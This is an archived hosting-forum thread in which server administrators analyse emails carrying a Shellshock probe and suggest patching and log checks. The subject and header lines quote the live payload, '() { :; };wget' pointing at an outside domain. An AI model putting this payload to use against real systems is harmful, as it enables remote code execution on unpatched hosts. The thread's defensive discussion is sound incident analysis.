Wget issue possibly security risk.

Portal Home > Knowledgebase > Articles Database > Wget issue possibly security risk.

Posted by ClarLabs, 07-03-2015, 02:37 AM
Hello WHT I have received an email yesterday that has no body text just a subject the subject is as follows. (){:;};wget -o/tmp/._http://mlanissan.co.in/HELLOWORLD/ I do not own that domain and when visiting the full url I get a 404 there actual site is about cars so I have no idea how this command was run or why. I was wondering what are the risks with the above if any and what should I do to mitigate it if it is a security risk. I am looking forward for all your wonderful replies. Thanks for your help Yours sincerely Chris Russell
Posted by wheelerc, 07-03-2015, 04:46 AM
I got a number of emails into one of my servers at around 11pm GMT last night: Received: from bearing.headissue.net ([178.248.246.217]:60440 helo=website.com) by with smtp (Exim 4.85) (envelope-from ) id 1ZAmWS-000585-12 for nobody@; Thu, 02 Jul 2015 22:59:56 +0100 To: () { :; };wget -o/tmp/._ http://mlanissan.co.in/HELLOWORLD From: () { :; };wget -o/tmp/._ http://mlanissan.co.in/HELLOWORLD Searching for the "http://mlanissan.co.in/HELLOWORLD" got me to this page. It looks like a failed attempt to exploit a mail handler?
Posted by Server Management, 07-03-2015, 05:30 AM
Are you able to take a quick look through your logs to see if you have any funky business going on with "User-Agent"
Posted by wheelerc, 07-03-2015, 05:35 AM
Through which logs? This was inbound email, which doesn't (as far as I'm aware) use a User-Agent. I can check the web access logs, but there is a lot of traffic to the server so is there anything specific you'd like me to search for?
Posted by Server Management, 07-03-2015, 05:47 AM
Theres not really a whole lot of information here but seeing "(){:;};" could raise a concern for the shellshock palava from last year which is still doing the rounds which could be done over SMTP. A quick check for anything funky with the user-agent could be beneficial.
Posted by AcheronMedia-VK, 07-03-2015, 06:20 AM
That's BASH exploit attempt (Shellshock), it seems, not wget. User-agent is just one vector, it's not strictly needed for the exploit. It was used because UA is the only way to inject a random string into the logs, and if there's a CGI via shell involved, it would trigger execution. In this case, if it's coming through mail, it's probing for a system that passes mail headers as env vars to a shell script. Eg. procmail or similar deployments.
Posted by ClarLabs, 07-03-2015, 04:42 PM
Thank you all for your replies, how can I check whether this has caused any issues, e.g. what log files would I need to view etc. I will look forward to your replies.
Posted by NickLim, 07-03-2015, 07:31 PM
Interesting... So they are planting the malicious command through their user agents into the logs? So if one were to parse the logs with an unsecured/vulnerable parser it may execute the malicious command? If so that is a very smart malware, and one that should make web operates be more careful of.
Posted by tuhostmx, 07-03-2015, 07:32 PM
Change nobody forward to empty value from your WHM as root. I had same issue but it was solved doing this. In some cases this is caused by remote spammers. Try to block the spammer ip
Posted by WHR-Abner, 07-04-2015, 03:00 AM
Yes, definitely sounds like the old Shellshock Bash Vulnerability. What is the version of bash in your server? Find that out via Then run to see if there are any updates available. If it is up to date, you don't have to worry much.
Posted by sabrina84, 07-04-2015, 03:01 PM
ClarCloud kindly update your server with latest patches and take a reboot. But please can you paste the output of "lsb_release -a" or "cat /etc/redhat-release" before and after patching. Last edited by Postbox; 07-04-2015 at 09:53 PM.